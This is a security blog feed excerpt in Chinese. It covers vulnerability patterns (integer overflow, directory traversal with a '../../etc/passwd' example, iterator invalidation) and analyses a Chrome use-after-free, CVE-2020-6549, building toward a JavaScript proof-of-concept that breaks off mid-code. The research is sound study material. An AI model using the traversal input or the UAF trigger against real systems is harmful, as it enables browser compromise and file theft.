整数溢出</h2><ul><li><p>整数之间做运算的结果超过范围，导致上溢或下溢</p></li><li><p>该漏洞是相当常见的，因为大多数情况下代码中都没有考虑运算的溢出</p></li><li><p>例子</p><ul><li><p>例1</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen可控</span></span><br><span class="line">ptr = <span class="built_in">realloc</span>(ptr, metaLen + dataLen);</span><br><span class="line"><span class="comment">// 当metaLen + dataLen上溢时，realloc只会分配一块较小的内存</span></span><br><span class="line"><span class="comment">// 这样就可以实现堆溢出</span></span><br></pre></td></tr></table></figure></li><li><p>例2</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> total_len;</span><br><span class="line"><span class="type">int</span> meta_len;</span><br><span class="line">...</span><br><span class="line"><span class="comment">// meta_len可控</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">int</span> data_len = total_len - meta_len;</span><br><span class="line"><span class="comment">// 此时data_len就会变的很大，例：(unsigned)(-1) = 0xFFFF</span></span><br></pre></td></tr></table></figure></li></ul></li><li><p>整数溢出的判别方式</p><ul><li><p>溢出肯定不是这么判别的（笑）</p><blockquote><p>注： 变量metaLen与dataLen都是int类型</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen可控</span></span><br><span class="line"><span class="keyword">if</span>(metaLen + dataLen &gt; INT_MAX)</span><br><span class="line">&#123; ... &#125;</span><br></pre></td></tr></table></figure></li><li><p>而通常是这样判别的</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen可控</span></span><br><span class="line"><span class="keyword">if</span>(INT_MAX - dataLen &lt; metaLen)</span><br><span class="line">&#123; ... &#125;</span><br></pre></td></tr></table></figure></li><li><p>但是当判别表达式比较繁杂的时候</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen可控</span></span><br><span class="line"><span class="keyword">if</span>(INT_MAX - ( <span class="number">1</span> + dataLen + <span class="number">1</span>) &lt; metaLen)</span><br><span class="line">&#123; </span><br><span class="line">  ...</span><br><span class="line">  ptr = <span class="built_in">realloc</span>(ptr, (metaLen + <span class="number">1</span>) + (dataLen + <span class="number">1</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>此时还是会造成整数溢出。</p><p>所以正确的判别式应该是将<strong>用户可控变量</strong>与<strong>用户不可控变量</strong>分开</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(用户可控变量 &lt; (用户不可控变量<span class="number">1</span> op 用户不可控变量<span class="number">2</span> ...))</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这方面要多加小心。</p></li></ul></li></ul><h2 id="3-目录遍历漏洞">3. 目录遍历漏洞</h2><ul><li><p>当程序对文件进行操作，需要其绝对地址时，程序会将当前工作目录的地址与程序名称进行拼接，以获得绝对地址</p><blockquote><p><code>/home/kiprey/</code> + <code>targetFilename</code> = <code>/home/kiprey/targetFilename</code></p></blockquote></li><li><p>但如果这个<code>targetFilename</code>不守规矩呢？</p><blockquote><p>例如<code>targetFilename</code> = <code>../../etc/passwd</code><br>则此时拼接起来的绝对地址为<code>/home/kiprey/../../etc/passwd</code>，实际上就是<code>/etc/passwd</code>，指向敏感文件<br>这便是<strong>目录遍历漏洞</strong></p></blockquote></li><li><p>可能有人会问，文件名不是不能包含<code>/</code>么？的确是这样，但数据文件中的<strong>数据</strong>却可以包含<code>/</code><br>例如，读取某个数据文件内的数据，这个数据是某个文件名。然后获取该指定文件的绝对地址，并将其发送<br>此时数据文件内的文件名就不受影响，可以内含反斜杠，因为此时其只是一段数据。<br>如果这个数据文件是精心构建的，那很有可能会把敏感文件发送出去。</p></li></ul><h2 id="4-迭代器失效漏洞">4. 迭代器失效漏洞</h2><p>以CVE-2020-6541、CVE-2020-6549为例，该类漏洞大多都是按这样的一个流程来触发UAF漏洞的</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">循环迭代某个元素集合Set，以执行函数A</span><br><span class="line">    在函数A内部，执行...</span><br><span class="line">    ...</span><br><span class="line">    在函数M内部，修改Set集合的元素个数（插入或删除元素），之后函数返回</span><br></pre></td></tr></table></figure><p>这样，当控制流从函数M依次向上返回至最上的迭代循环后，由于<strong>所遍历的元素集合被修改</strong>，因此<strong>下一次所使用的迭代器将失效</strong>。这样就会造成UAF漏洞。</p><h2 id="Continuing…">Continuing…</h2>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里会持续记录平常见到的一些漏洞模式&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="vuln patterns" scheme="https://kiprey.github.io/tags/vuln-patterns/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2020-6549分析</title>
    <link href="https://kiprey.github.io/2020/10/CVE-2020-6549/"/>
    <id>https://kiprey.github.io/2020/10/CVE-2020-6549/</id>
    <published>2020-10-17T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.772Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><ul><li>CVE-2020-6549是Google Chrome里media中的Use-after-free漏洞，在版本84.0.4147.125之前该漏洞允许攻击者通过精心构造的html代码来造成堆破坏。</li></ul><span id="more"></span><h2 id="二、漏洞相关">二、漏洞相关</h2><h3 id="a-漏洞概述">a. 漏洞概述</h3><p>漏洞函数 - <a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc;l=239;drc=229c7c3d0ce550a83edbbff0d8301d6677fe0328">vuln src</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!media_element_-&gt;<span class="built_in">currentSrc</span>().<span class="built_in">IsEmpty</span>() &amp;&amp;</span><br><span class="line">      !media_element_-&gt;<span class="built_in">IsMediaDataCorsSameOrigin</span>()) &#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> source : sources_)</span><br><span class="line">      <span class="built_in">DidStopMediaStreamSource</span>(source.<span class="built_in">Get</span>());</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当media元素加载跨域URL时，函数<code>UpdateSources</code>将会通知相关的<code>MediaStreamSource</code>对象。而在遍历<code>sources_</code>集时，它可能会通过以下调用路径来调度JS事件。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">MediaElementEventListener::UpdateSources</span><br><span class="line">  DidStopMediaStreamSource</span><br><span class="line">    <span class="comment">// Stops the source (by calling DoStopSource()) and runs FinalizeStopSource().</span></span><br><span class="line">    WebPlatformMediaStreamSource::StopSource</span><br><span class="line">      <span class="comment">// Runs the stop callback (if set) and sets the</span></span><br><span class="line">      <span class="comment">// WebMediaStreamSource::readyState to ended. This can be used by</span></span><br><span class="line">      <span class="comment">// implementations to implement custom stop methods.</span></span><br><span class="line">      WebPlatformMediaStreamSource::FinalizeStopSource</span><br><span class="line">      WebMediaStreamSource::SetReadyState</span><br><span class="line">          MediaStreamSource::SetReadyState</span><br><span class="line">          <span class="comment">// MediaStreamSourceObserver</span></span><br><span class="line">            MediaStreamTrack::SourceChangedState</span><br><span class="line">              EventTarget::DispatchEvent</span><br></pre></td></tr></table></figure><p>而攻击者可以为相应的<code>MediaStreamTrack</code>对象注册一个事件处理程序，该事件处理程序将在media元素上<strong>调用一个虚假的<code>loadedmetadata</code>事件</strong>，以<strong>重新调用<code>UpdateSources</code>函数</strong>，并<strong>调整其<code>sources_</code>集合的大小</strong>。而这将使得外层的<code>UpdateSources</code>调用中<strong>基于范围的for循环语句所使用的迭代器无效</strong>。 当执行返回到外部调用时，该函数尝试从迭代器中获取下一个元素，此时所使用无效的迭代器将导致UAF。</p><h3 id="b-漏洞细节">b. 漏洞细节</h3><h4 id="1-加载跨域URL">1. 加载跨域URL</h4><p>漏洞函数<code>MediaElementEventListenerL::UpdateSources</code>在内部会执行<code>DidStopMediaStreamSource</code>函数来处理所有的<code>MediaStreamSource</code>对象。而处理sources_前首先要满足的条件是<strong>跨域</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 如果当前的src（即URL）非空，并且是跨域的，则遍历处理sources</span></span><br><span class="line">  <span class="keyword">if</span> (!media_element_-&gt;<span class="built_in">currentSrc</span>().<span class="built_in">IsEmpty</span>() &amp;&amp;</span><br><span class="line">      !media_element_-&gt;<span class="built_in">IsMediaDataCorsSameOrigin</span>())</span><br><span class="line">    <span class="comment">// 遍历处理sources</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> source : sources_)</span><br><span class="line">      <span class="built_in">DidStopMediaStreamSource</span>(source.<span class="built_in">Get</span>());</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="2-设置对应的事件处理函数">2. 设置对应的事件处理函数</h4><ul><li><p>对于每个<code>sources</code>，函数<code>DidStopMediaStreamSource()</code>将会获取其对应的<code>WebPlatformMediaStreamSource</code>并执行<code>StopSouces()</code>函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">DidStopMediaStreamSource</span><span class="params">(MediaStreamSource* source)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!source)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  <span class="comment">// 获取WebPlatformMediaStreamSource</span></span><br><span class="line">  WebPlatformMediaStreamSource* <span class="type">const</span> platform_source =</span><br><span class="line">      source-&gt;<span class="built_in">GetPlatformSource</span>();</span><br><span class="line">  <span class="built_in">DCHECK</span>(platform_source);</span><br><span class="line">  <span class="comment">// 对WebPlatformMediaStreamSource执行StopSource函数</span></span><br><span class="line">  platform_source-&gt;<span class="built_in">StopSource</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在<code>StopSources</code>函数中，我们主要关注函数<code>FinalizeStopSource()</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebPlatformMediaStreamSource::StopSource</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DoStopSource</span>();</span><br><span class="line">  <span class="comment">// 主要关注</span></span><br><span class="line">  <span class="built_in">FinalizeStopSource</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在<code>FinalizeStopSource()</code>中，函数会对当前的<code>WebPlatformMediaStreamSource</code>类实例的Owner（即一个<code>WebMediaStreamSource</code>类实例）执行<code>SetReadyState()</code>函数，以设置其状态</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebPlatformMediaStreamSource::FinalizeStopSource</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!stop_callback_.<span class="built_in">is_null</span>())</span><br><span class="line">    std::<span class="built_in">move</span>(stop_callback_).<span class="built_in">Run</span>(<span class="built_in">Owner</span>());</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">Owner</span>())</span><br><span class="line">    <span class="built_in">Owner</span>().<span class="built_in">SetReadyState</span>(WebMediaStreamSource::kReadyStateEnded);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>而这里所执行的<code>SetReadyState()</code>实际上只是一个Wrapper，它的内部会继续调用<code>MediaStreamSource::SetReadyState()</code>函数。</p><blockquote><p>这里的<code>private_</code>指针是<code>MediaStreamSource</code>类型的。<code>WebMediaStreamSource</code>内部拥有一个指向<code>MediaStreamSource</code>类的指针。</p><p>此时这里出现了<code>WebPlatformMediaStreamSource</code>、<code>MediaStreamSource</code>以及<code>WebMediaStreamSource</code>这三种MediaStreamSource，他们之间的关系不需要细究，这里只需了解其中的函数调用链即可。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebMediaStreamSource::SetReadyState</span><span class="params">(ReadyState state)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!private_.<span class="built_in">IsNull</span>());</span><br><span class="line">  private_-&gt;<span class="built_in">SetReadyState</span>(<span class="built_in">static_cast</span>&lt;MediaStreamSource::ReadyState&gt;(state));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在<code>MediaStreamSource::SetReadyState</code>函数中，函数内部会继续调用<code>observer-&gt;SourceChangedState()</code>。<code>Observer</code>类是一个虚基类，不过我们可以通过交叉引用，来确认在该函数中，<code>Observer</code>是一个<code>MediaStreamTrack</code>类型。即该函数最终调用的是<code>MediaStreamTrack::SourceChangedState()</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaStreamSource::SetReadyState</span><span class="params">(ReadyState ready_state)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">SendLogMessage</span>(String::<span class="built_in">Format</span>(<span class="string">&quot;SetReadyState(&#123;id=%s&#125;, &#123;ready_state=%s&#125;)&quot;</span>,</span><br><span class="line">                                <span class="built_in">Id</span>().<span class="built_in">Utf8</span>().<span class="built_in">c_str</span>(),</span><br><span class="line">                                <span class="built_in">ReadyStateToString</span>(ready_state))</span><br><span class="line">                     .<span class="built_in">Utf8</span>());</span><br><span class="line">    <span class="comment">// ....</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Observers may dispatch events which create and add new Observers;</span></span><br><span class="line">    <span class="comment">// take a snapshot so as to safely iterate.</span></span><br><span class="line">    HeapVector&lt;Member&lt;Observer&gt;&gt; observers;</span><br><span class="line">    <span class="built_in">CopyToVector</span>(observers_, observers);</span><br><span class="line">    <span class="comment">// 在此处调用了</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> observer : observers)</span><br><span class="line">      observer-&gt;<span class="built_in">SourceChangedState</span>();</span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>MediaStreamTrack::SourceChangedState()</code>函数是一个<strong>重头戏</strong>。这里笔者先贴出该函数的源码，然后再继续说明。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaStreamTrack::SourceChangedState</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">Ended</span>())</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Note that both &#x27;live&#x27; and &#x27;muted&#x27; correspond to a &#x27;live&#x27; ready state in the</span></span><br><span class="line">  <span class="comment">// web API, hence the following logic around |feature_handle_for_scheduler_|.</span></span><br><span class="line"></span><br><span class="line">  ready_state_ = component_-&gt;<span class="built_in">Source</span>()-&gt;<span class="built_in">GetReadyState</span>();</span><br><span class="line">  <span class="keyword">switch</span> (ready_state_) &#123;</span><br><span class="line">    <span class="keyword">case</span> MediaStreamSource::kReadyStateLive:</span><br><span class="line">      component_-&gt;<span class="built_in">SetMuted</span>(<span class="literal">false</span>);</span><br><span class="line">      <span class="comment">//发送unmute事件</span></span><br><span class="line">      <span class="built_in">DispatchEvent</span>(*Event::<span class="built_in">Create</span>(event_type_names::kUnmute));</span><br><span class="line">      <span class="built_in">EnsureFeatureHandleForScheduler</span>();</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> MediaStreamSource::kReadyStateMuted:</span><br><span class="line">      component_-&gt;<span class="built_in">SetMuted</span>(<span class="literal">true</span>);</span><br><span class="line">      <span class="comment">//发送mute事件</span></span><br><span class="line">      <span class="built_in">DispatchEvent</span>(*Event::<span class="built_in">Create</span>(event_type_names::kMute));</span><br><span class="line">      <span class="built_in">EnsureFeatureHandleForScheduler</span>();</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="comment">// 这里我们关注这个事件</span></span><br><span class="line">    <span class="keyword">case</span> MediaStreamSource::kReadyStateEnded:</span><br><span class="line">      <span class="comment">//发送ended事件</span></span><br><span class="line">      <span class="built_in">DispatchEvent</span>(*Event::<span class="built_in">Create</span>(event_type_names::kEnded));</span><br><span class="line">      <span class="built_in">PropagateTrackEnded</span>();</span><br><span class="line">      feature_handle_for_scheduler_.<span class="built_in">reset</span>();</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">SendLogMessage</span>(</span><br><span class="line">      base::<span class="built_in">StringPrintf</span>(<span class="string">&quot;SourceChangedState([id=%s] &#123;readyState=%s&#125;)&quot;</span>,</span><br><span class="line">                       <span class="built_in">id</span>().<span class="built_in">Utf8</span>().<span class="built_in">c_str</span>(), <span class="built_in">readyState</span>().<span class="built_in">Utf8</span>().<span class="built_in">c_str</span>()));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在该函数内部将会执行<code>DispatchEvent</code>函数，不同的switch分支将会dispatch不同的事件，分别是<code>mute</code>、<code>unmute</code>以及<code>ended</code>事件。与之相对的，在JS中有对应这三个事件的事件处理程序：</p><blockquote><p>以下JS资料节选自<a href="https://developer.mozilla.org/zh-CN/docs/Web/API/MediaStreamTrack">MediaStreamTrack - MDN</a></p></blockquote><blockquote><h4 id="事件处理">事件处理</h4><ul><li><p><code>MediaStreamTrack.onmute</code></p><p>这是<code>mute</code>事件在这个对象被触发时调用的事件处理器<code>EventHandler</code>，这时这个流被中断。</p></li><li><p><code>MediaStreamTrack.onunmute</code></p><p>这是<code>unmute</code>事件在这个对象上被触发时调用的事件处理器<code>EventHandler</code>，未实现。</p></li><li><p><code>MediaStreamTrack.onended</code></p><p>这是<code>ended</code>事件在这个对象被触发时调用的事件处理器<code>EventHandler</code>，未实现。</p></li></ul></blockquote><p>也就是说，如果我们在JS接口处实现了一个这样的事件处理函数，那么在dispatch事件时，将会执行JS中对应的事件处理函数。</p><blockquote><p>需要注意的是，在<code>MediaStreamTrack::SourceChangedState()</code>中一旦执行<code>DispatchEvent</code>函数，那么在<strong>执行对应事件处理函数中的JS代码</strong>时，render进程的控制流将始终位于所执行的<code>DispatchEvent</code><strong>函数内部</strong>。换句话说，只有当JS中的事件处理函数执行结束后，render才会从刚刚所执行的<code>DispatchEvent</code>函数中返回，并一步一步向上返回。</p></blockquote><p>而这也是漏洞的关键。我们如果构造一个特殊的事件处理函数，那么就可以试着二次调用<code>UpdateSources</code>函数。即函数调用链可以是这样的:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">    UpdateSources</span><br><span class="line">      ...</span><br><span class="line">        DispatchEvent</span><br><span class="line">          ...</span><br><span class="line">            V8</span><br><span class="line">              ...</span><br><span class="line">                UpdateSources</span><br></pre></td></tr></table></figure><p>上面中乱入的V8即解释JS代码的引擎。render将在进入<code>DispatchEvent</code>函数的基础上，在内部使用V8引擎来解释事件处理函数中的JS代码，并进一步调用该JS代码所对应的render内部函数<code>UpdateSources</code>。</p></li><li><p>基本的调用思路有了，现在的一个问题是，我们该<strong>构造哪个事件的事件处理函数</strong>呢？这里推荐<code>ended</code>事件，因为这个事件最容易触发，例如<strong>跨域操作就会触发该ended事件</strong>。</p></li></ul><h4 id="3-调用UpdateSources函数">3. 调用UpdateSources函数</h4><ul><li><p>在讲解这部分前，先再次阅读漏洞触发的函数调用</p><blockquote><p>阅读时<strong>注意每个函数所属的类名称</strong>。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">MediaElementEventListener::UpdateSources</span><br><span class="line">  DidStopMediaStreamSource</span><br><span class="line">    WebPlatformMediaStreamSource::StopSource</span><br><span class="line">      WebPlatformMediaStreamSource::FinalizeStopSource</span><br><span class="line">      WebMediaStreamSource::SetReadyState</span><br><span class="line">          MediaStreamSource::SetReadyState</span><br><span class="line">            MediaStreamTrack::SourceChangedState</span><br><span class="line">              EventTarget::DispatchEvent</span><br></pre></td></tr></table></figure></li><li><p>现在我们已经可以尝试通过MediaStreamTrack对象来执行DispatchEvent事件，但问题是，如何调用最顶层的<code>UpdateSources</code>？</p></li><li><p>注意到<code>UpdateSources</code>函数所在的类为<code>MediaElementEventListener</code>，我们试着在<a href="https://developer.mozilla.org/zh-CN/docs/Web/API">API - MDN</a>中搜索<code>MediaElement</code>，果然在JS API中<strong>找到了<code>HTMLMediaElement</code>对象</strong> - <a href="https://developer.mozilla.org/zh-CN/docs/Web/API/HTMLMediaElement">HTMLMediaElement - MDN</a></p></li><li><p>顺着函数调用链，发现由于<code>UpdateSources</code>函数深层调用中会调用<code>WebPlatformMediaStreamSource::StopSource</code>，因此我们试着在<code>HTMLMediaElement</code>的API说明中搜索<code>WebPlatformMediaStreamSource</code>相关的字符串。并最终找到了<strong>JS对象<code>MediaStream</code></strong> 。</p><blockquote><p>在查阅<code>HTMLMediaElement</code>的API时，发现了一个函数<code>HTMLMediaElement.crossOrigin</code>。这个函数的发现可以间接佐证修改<code>HTMLMediaElement</code>的<code>src</code>成员属性可以<strong>触发跨域事件</strong></p></blockquote></li><li><p>在<code>HTMLMediaElement</code>JS API中我们找到了这个对象相关的几个API，不过这里我们只关注<code>HTMLMediaElement.captureStream()</code>，<strong>该函数会获取当前<code>HTMLMediaElement</code>中的<code>MediaStream</code></strong>。这样，<strong>我们就可以将<code>HTMLMediaElement</code>对象与<code>MediaStream</code>对象联系起来。</strong></p></li><li><p><strong><code>MediaStream</code></strong> 接口是一个媒体内容的流.。一个流包含几个<em>轨道（track）</em>，比如视频和音频轨道。<a href="https://developer.mozilla.org/zh-CN/docs/Web/API/MediaStream">MediaStream - MDN</a>。 <code>MediaStream</code>接口中存在几个事件处理函数与方法。这里我们只介绍两种：</p><ul><li>一个是<code>MediaStream.onaddtrack</code>事件处理器。当一个<code>MediaStreamTrack</code>被添加到流后会触发该事件处理器。我们可以利用这个事件来确保在<code>MediaStreamTrack</code>加载后再来执行跨域操作，避免出现一些意外的问题。</li><li>再一个就是<code>MediaStream.getTracks</code>函数。通过该函数我们可以获取<code>MediaStream</code>对象内部的<code>MediaStreamTrack</code>对象。</li></ul><p>这样，我们便串起了<code>HTMLMediaElement - MediaStream - MediaStreamTrack</code>。</p></li><li><p>最后一个问题，我们是通过<code>HTMLMediaElement</code>JS对象来一步一步的触发UAF，但我们在具体实现POC时，无法直接用JS构造<code>HTMLMediaElement</code>对象。通过查阅MDN中相关信息，我们可以试着构造一下<code>HTMLAudioElement</code>对象。这个对象是由<code>HTMLMediaElement</code>派生出来的JS对象，而<strong>该对象的constructor是<code>Audio()</code></strong> 。</p></li><li><p>所以最后我们构建出的<strong>基本测试代码</strong>如下：</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable constant_">AUDIO_URL</span> = <span class="string">&#x27;http://localhost:8000/audio.mp3&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">audio = <span class="keyword">new</span> <span class="title class_">Audio</span>(<span class="variable constant_">AUDIO_URL</span>);</span></span><br><span class="line"><span class="language-javascript">stream = audio.<span class="title function_">captureStream</span>();</span></span><br><span class="line"><span class="language-javascript">stream.<span class="property">onaddtrack</span> = <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">  track = stream.<span class="title function_">getAudioTracks</span>()[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// 设置MediaStreamTrack的onended事件处理函数</span></span></span><br><span class="line"><span class="language-javascript">  track.<span class="property">onended</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="comment">// 在这里应该试着在render中再次调用UpdateSources函数</span></span></span><br><span class="line"><span class="language-javascript">  &#125;</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// 修改audio的src，将URL替换为跨域的URL，以便于在render中执行UpdateSources函数</span></span></span><br><span class="line"><span class="language-javascript">  audio.<span class="property">src</span> = <span class="variable constant_">AUDIO_URL</span>.<span class="title function_">replace</span>(<span class="string">&#x27;localhost&#x27;</span>, <span 